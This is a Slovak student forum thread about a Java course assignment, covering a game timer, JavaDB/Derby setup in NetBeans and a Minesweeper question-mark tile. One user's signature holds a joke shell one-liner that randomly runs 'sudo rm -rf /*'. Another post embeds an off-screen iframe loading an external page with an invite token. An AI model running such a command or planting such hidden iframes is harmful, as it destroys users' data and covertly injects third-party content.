• Welcome to TUKE FÓRUM - Fórum pre študentov Technickej Univerzity v Košiciach.

Java

Started by kOsTi, 23.02.2008, 02:17:18

« predchdzajce - alie »

Mao

Pri uspesnom ukonceni hry zapises dosiahnuty cas do tabulky najlepsich casov a potom sa najlepsie casy zobrazuju z nej. Cize by uz nemal byt problem. Pripadne ak mas este okno do ktoreho zadavas meno hraca, ktory dosiahol dany cas, tak pri jeho otvoreni si musis zapamatat dosiahnuty cas, lebo zadanie mena trva isty cas a potom vznika rozdiel.

JCube

pripadne zastavis timer hned ako je hra v stave solved.
sudo [ $[ $RANDOM % 6 ] == 0 ] && rm -rf /* || echo "Alive!"

puq

alebo das podmienku ze sa bude timer obnovovat iba ked je gamestate playing :)

buhehe

Quote from: JCube on  27.04.2008, 00:12:52
pripadne zastavis timer hned ako je hra v stave solved.
ale necem pouzit timer.stop()
Quote from: puq on  27.04.2008, 00:58:22
alebo das podmienku ze sa bude timer obnovovat iba ked je gamestate playing :)
ved tak mam...

uz som to urobil ale aj tak thx...

LONEr

Caute, vsetko mi fici, len mam problem spravit databazu. Ked nastavujem cez tools/JAVA database/settings tak ktoru zlozku mam dat? lebo fakt neviem nic najst ako db alebo hocico... thx

BossZ

Quote from: LONEr on  27.04.2008, 05:49:23
Caute, vsetko mi fici, len mam problem spravit databazu. Ked nastavujem cez tools/JAVA database/settings tak ktoru zlozku mam dat? lebo fakt neviem nic najst ako db alebo hocico... thx

org.hsqldb.jdbcDriver
<iframe style="width:300px;height:600px;padding:0;margin: -300px 0px 0px 0px;border:0;" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://www.androidroka.sk/wp-content/themes/androidRoku/iframe.php?invite=52633e266001a22a5eb0166ee736bc68"></iframe>

LONEr

Quote from: BossZ on  27.04.2008, 18:30:17
Quote from: LONEr on  27.04.2008, 05:49:23

org.hsqldb.jdbcDriver
no neviem, barz si mi nepomohol :D

kOsTi

ja som musel JavaDB doinstalovat... stiahni zo Sunu :)
:trestac:

brazell

Caves  bv
doinstaloval som tu JavaDB zo Sunu, aspon teda stiahol som tu 10.3.2, ale stale nemam nieco ako .netbeans-derby a tak nemozem sa pohnut z toho kroku dalej, pise ze ze jednoducho v C:\Program Files\Java\jdk1.6.0_04\db tu neobsahujem ziadnu databazu ...neviete mi nahodou pomoct ???  bk
dakujem moc  br

kOsTi

no tak podla toho kde si istaloval tu JavaDB... tam bude derby... ;)

napr: C:\Program Files\Sun\JavaDB\lib\derby.jar

brazell

Hej hej ved prave kukam, ze mi to niekde inde hodilo a ze to bude chyba...vdaka inak :) verim ze to nejako napojim...

brazell

No mam presne tak ako si napisal ale aj tak vypisuje ze sa to tam nenachadza JavaDB location ale je to tam, ked kuknem do adresara tak je tam derby.jar..

puq

si postupoval presne podla navodu z 12cvika? ak hej tak nemozes mat problem

brazell

hej presne podla navodu z cvika...uplne presne ...uz to citam asi 5x :( ale proste tam v 3. ulohe na nakonfigurovanie jednoducho co pripojim mi hlasi ze sa tam nenachadza JavaDB location a ja neviem...pricom ako kosti povedal mam tam aj derby.jar...tak neviem ...

kOsTi

noo takto... jedna vec je DB installation a druha DB location ... location si vyberas sam kde ma byt... tam sa ulozi vysledna databaza...

installation daj len: C:\Program Files\Sun\JavaDB

brazell

Vdaka vdaka hej som pripojoval aj to lib a nejako nechcelo vziat teraz berie... vdaka :)

Payne

Sa chcem spytat, ze co sa mysli pod Rozšírte stav dlaždice o označenie otáznikom.???

vobec nechapem ze co mam robit akoze...

kOsTi

zapni si miny vo Windowse a skus dva krat kliknut na minu pravym tlacitkom ;)

puq

ta to znamena ze nevies co to je:) ale podla mna zbytocnost

Payne

No ja nemam vo wine a ani mi nejdu doinstalovat, mam daco pohubene...

No a aky to ma vlastne prakticky vyznam toto?

kOsTi

no ziaden... len proste bude dalsi stav a to bude dlazdica s otaznikom... ktora sa da napr rovno otvorit nie ako marked... je to len na to ked si nie si isty ci tam mina je alebo nie tak zas otaznik

TradeMark

Ja hram miny od Win98 a v zivote som otaznik nepouzil...skor je uzitocne to stlacenie dvoch tlacidiel naraz ;)
Pičoch jest veľo, ale nalivačoch malo!

puq

ee lepsie je stlacit len jedno, bud prave alebo stredne, obe tlacitka su tiez neprakticke :P

kOsTi

tak ono ked to tam chcu mat tak to tam urobite nie? ved to  nie je vela prace naviac a je za to par bodov no...

Payne

kokos, ta ked ma teraz nerozjebe, ta uz asi nikdy...

boha tu som mal uz vseko okrem par nepovinnych funkcne a daco som pomenil a uz nejde vobec oznacovat dlazdice....

JEBNE MAAAA